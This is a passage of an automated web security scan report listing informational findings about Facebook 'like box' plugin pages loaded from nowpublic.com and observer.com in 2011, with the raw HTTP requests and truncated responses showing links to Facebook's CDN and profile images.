<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001572506264" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260953_100001572506264_1840044396_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000398385421" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274063_100000398385421_2042837218_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002412406198" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275105_100002412406198_2586465_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000754023240" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...

11.51. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.48
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:35 GMT
Content-Length: 12828

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002874815552" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275843_100002874815552_3370960_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000754023240" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Mureedbizenjo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174496_661700762_292052_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275937_683674778_595354284_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.52. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.12.35
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:17 GMT
Content-Length: 13173

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261029_1193179193_1591267711_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.53. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.21.37
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:23 GMT
Content-Length: 12833

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001572506264" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260953_100001572506264_1840044396_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1054856459" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/161422_1054856459_6083028_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Mureedbizenjo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174496_661700762_292052_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275937_683674778_595354284_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.54. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.37.115
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:16 GMT
Content-Length: 12854

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002874815552" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275843_100002874815552_3370960_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002412406198" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275105_100002412406198_2586465_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275937_683674778_595354284_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000754023240" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...

11.55. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.140.49
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:28 GMT
Content-Length: 13255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pacokiuoficial" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275029_623408303_7363567_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.56. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:25 GMT
Content-Length: 13240

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
